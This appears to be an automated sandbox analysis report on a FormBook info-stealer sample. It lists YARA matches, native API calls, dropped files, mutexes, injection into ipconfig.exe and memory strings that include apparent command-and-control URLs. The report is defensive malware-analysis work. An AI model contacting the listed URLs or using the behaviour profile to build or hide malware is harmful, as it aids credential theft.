Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp String found in binary or memory: https://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp String found in binary or memory: https://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DE2 NtQuerySystemInformation, 0_2_058A4DE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DA8 NtQuerySystemInformation, 0_2_058A4DA8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181B0 NtCreateFile, 5_2_004181B0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418260 NtReadFile, 5_2_00418260
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004182E0 NtClose, 5_2_004182E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418390 NtAllocateVirtualMemory, 5_2_00418390
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181AA NtCreateFile, 5_2_004181AA
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041825A NtReadFile, 5_2_0041825A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_015B9910
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99A0 NtCreateSection,LdrInitializeThunk, 5_2_015B99A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9840 NtDelayExecution,LdrInitializeThunk, 5_2_015B9840
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_015B9860
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98F0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_015B98F0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A50 NtCreateFile,LdrInitializeThunk, 5_2_015B9A50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_015B9A00
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A20 NtResumeThread,LdrInitializeThunk, 5_2_015B9A20
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9540 NtReadFile,LdrInitializeThunk, 5_2_015B9540
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95D0 NtClose,LdrInitializeThunk, 5_2_015B95D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9710 NtQueryInformationToken,LdrInitializeThunk, 5_2_015B9710
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9FE0 NtCreateMutant,LdrInitializeThunk, 5_2_015B9FE0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9780 NtMapViewOfSection,LdrInitializeThunk, 5_2_015B9780
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_015B97A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_015B9660
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_015B96E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9950 NtQueueApcThread, 5_2_015B9950
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99D0 NtCreateProcessEx, 5_2_015B99D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BB040 NtSuspendThread, 5_2_015BB040
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9820 NtEnumerateKey, 5_2_015B9820
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98A0 NtWriteVirtualMemory, 5_2_015B98A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9B00 NtSetValueKey, 5_2_015B9B00
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA3B0 NtGetContextThread, 5_2_015BA3B0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A10 NtQuerySection, 5_2_015B9A10
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A80 NtOpenDirectoryObject, 5_2_015B9A80
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9560 NtWriteFile, 5_2_015B9560
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BAD30 NtSetContextThread, 5_2_015BAD30
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9520 NtWaitForSingleObject, 5_2_015B9520
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95F0 NtQueryInformationFile, 5_2_015B95F0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA770 NtOpenThread, 5_2_015BA770
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9770 NtSetInformationFile, 5_2_015B9770
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9760 NtOpenProcess, 5_2_015B9760
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA710 NtOpenProcessToken, 5_2_015BA710
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9730 NtQueryVirtualMemory, 5_2_015B9730
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9650 NtQueryValueKey, 5_2_015B9650
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9670 NtQueryInformationProcess, 5_2_015B9670
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9610 NtEnumerateValueKey, 5_2_015B9610
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96D0 NtCreateKey, 5_2_015B96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99840 NtDelayExecution,LdrInitializeThunk, 15_2_00D99840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_00D99860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999A0 NtCreateSection,LdrInitializeThunk, 15_2_00D999A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_00D99910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A50 NtCreateFile,LdrInitializeThunk, 15_2_00D99A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995D0 NtClose,LdrInitializeThunk, 15_2_00D995D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99540 NtReadFile,LdrInitializeThunk, 15_2_00D99540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996D0 NtCreateKey,LdrInitializeThunk, 15_2_00D996D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_00D996E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99FE0 NtCreateMutant,LdrInitializeThunk, 15_2_00D99FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99780 NtMapViewOfSection,LdrInitializeThunk, 15_2_00D99780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99710 NtQueryInformationToken,LdrInitializeThunk, 15_2_00D99710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998F0 NtReadVirtualMemory, 15_2_00D998F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998A0 NtWriteVirtualMemory, 15_2_00D998A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9B040 NtSuspendThread, 15_2_00D9B040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99820 NtEnumerateKey, 15_2_00D99820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999D0 NtCreateProcessEx, 15_2_00D999D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99950 NtQueueApcThread, 15_2_00D99950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A80 NtOpenDirectoryObject, 15_2_00D99A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A10 NtQuerySection, 15_2_00D99A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A00 NtProtectVirtualMemory, 15_2_00D99A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A20 NtResumeThread, 15_2_00D99A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A3B0 NtGetContextThread, 15_2_00D9A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99B00 NtSetValueKey, 15_2_00D99B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995F0 NtQueryInformationFile, 15_2_00D995F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99560 NtWriteFile, 15_2_00D99560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9AD30 NtSetContextThread, 15_2_00D9AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99520 NtWaitForSingleObject, 15_2_00D99520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99650 NtQueryValueKey, 15_2_00D99650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99670 NtQueryInformationProcess, 15_2_00D99670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99660 NtAllocateVirtualMemory, 15_2_00D99660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99610 NtEnumerateValueKey, 15_2_00D99610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D997A0 NtUnmapViewOfSection, 15_2_00D997A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A770 NtOpenThread, 15_2_00D9A770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99770 NtSetInformationFile, 15_2_00D99770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99760 NtOpenProcess, 15_2_00D99760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A710 NtOpenProcessToken, 15_2_00D9A710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99730 NtQueryVirtualMemory, 15_2_00D99730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81B0 NtCreateFile, 15_2_003C81B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C8260 NtReadFile, 15_2_003C8260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C82E0 NtClose, 15_2_003C82E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81AA NtCreateFile, 15_2_003C81AA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C825A NtReadFile, 15_2_003C825A
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: String function: 0157B150 appears 48 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 00D5B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.261415495.00000000094D0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000000.227243971.0000000000FC2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252059704.0000000003631000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258531380.0000000008BE0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameIEFRAME.DLLD vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.256930094.00000000075F0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.294838186.0000000000B22000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295432403.00000000017FF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295601970.0000000003157000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Uses 32bit PE files
Source: 08917506_by_Libranalysis.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 08917506_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: OfCxSfBf.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@14/9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4D12 AdjustTokenPrivileges, 0_2_058A4D12
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4CDB AdjustTokenPrivileges, 0_2_058A4CDB
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Roaming\OfCxSfBf.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:360:120:WilError_01
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Mutant created: \Sessions\1\BaseNamedObjects\VcUWFLvHOIJOkLh
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp
Source: 08917506_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
